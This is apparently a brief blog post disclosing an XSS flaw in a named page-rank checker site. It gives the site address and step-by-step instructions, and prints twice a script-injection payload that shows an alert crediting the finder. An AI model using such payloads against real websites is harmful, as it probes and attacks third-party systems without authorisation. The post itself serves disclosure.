XSS found in CheckPageRankGoogle.com by Girish Shrimali
Girish Shrimali,wasn't too active lately.But now,he found a site which shows us Google page rank of any website, itself vulnerable to XSS.
Vulnerable website
http://checkpagerankgoogle.comGo to http://checkpagerankgoogle.com and insert below script into search box and press go button.
Script:
<script>alert(String.fromCharCode(88, 83, 83, 32, 102, 111, 117, 110, 100, 32, 98, 121, 32, 71, 105, 114, 105, 115, 104, 32, 83, 104, 114, 105, 109, 97, 108, 105));</script>
Script:
<script>alert(String.fromCharCode(88, 83, 83, 32, 102, 111, 117, 110, 100, 32, 98, 121, 32, 71, 105, 114, 105, 115, 104, 32, 83, 104, 114, 105, 109, 97, 108, 105));</script>